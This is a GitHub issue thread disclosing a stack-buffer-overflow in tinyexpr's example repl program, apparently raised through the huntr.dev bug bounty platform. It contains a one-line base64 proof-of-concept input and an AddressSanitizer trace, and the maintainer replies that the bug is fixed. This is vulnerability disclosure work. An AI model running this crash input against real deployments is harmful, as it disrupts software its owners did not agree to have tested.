Potential Security Issue
huntr-helper opened this issue ยท 6 comments
๐ Hello, we've received a report for a potential medium severity security issue in your repository.
Next Steps
1๏ธโฃ Visit https://huntr.dev/bounties/1-other-codeplea/tinyexpr for more advisory information.
2๏ธโฃ Sign-up to validate or speak to the researcher for more assistance.
3๏ธโฃ Propose a patch or outsource it to our community.
Confused or need more help?
-
Join us on our Discord and a member of our team will be happy to help! ๐ค
-
Speak to a member of our team: @JamieSlome
This issue was automatically generated by huntr.dev - a bug bounty board for securing open source code.
Just post it here or email me.
Stack-based Buffer Overflow in codeplea/tinyexpr
โ๏ธ Description
Whilst experimenting with repl built from commit 61af1d, with Clang 10 (+ASan) on Ubuntu 20.04.2 LTS, we discovered an expression containing 4 null characters after a newline which, due to insufficient bounds checking, triggers a stack-buffer-overflow.
๐ต๏ธโโ๏ธ Proof of Concept
echo "c3FydCg1XjIrN14yKzExXjIrKDgtMileMikKAAAAAAA=" | base64 -d | ../repl
The above POC produces this ASan stack trace:
==3156664==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffeadf9cf6f at pc 0x0000004c4c28 bp 0x7ffeadf9cf30 sp 0x7ffeadf9cf28
READ of size 1 at 0x7ffeadf9cf6f thread T0
#0 0x4c4c27 in readline /root/tinyexpr/repl.c:22:9
#1 0x4c4c27 in repl /root/tinyexpr/repl.c:49:22
#2 0x4c4c27 in main /root/tinyexpr/repl.c:73:9
#3 0x7ff914e5e0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#4 0x41c6cd in _start (/root/tinyexpr/repl+0x41c6cd)
Address 0x7ffeadf9cf6f is located in stack of thread T0 at offset 47 in frame
#0 0x4c454f in main /root/tinyexpr/repl.c:65
This frame has 3 object(s):
[32, 36) 'err.i.i' (line 36)
[48, 1072) 'buf.i.i' (line 12) <== Memory access at offset 47 underflows this variable
[1200, 1204) 'err.i' (line 36)
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow /root/tinyexpr/repl.c:22:9 in readline
๐ฅ Impact
This vulnerability is capable of crashing the software and/or triggering unintended consequences of overflowing the stack buffer.
Refs:
Line 22 in 61af1dd
Thanks for the report. I believe it's fixed now. (Please let me know if that isn't the case.)
I want to point out that this is an issue with the example program, repl. It does not appear to be an issue with the tinyexpr library itself. Any users of the tinyexpr C library should be unaffected.
@mortie I believe this is your code. Just flagging you in case you've also used this code elsewhere.
@codeplea - if you validate and confirm the fix on the platform, we can reward you the bounty for the fix.
https://huntr.dev/bounties/1-other-codeplea/tinyexpr
Cheers! ๐ฐ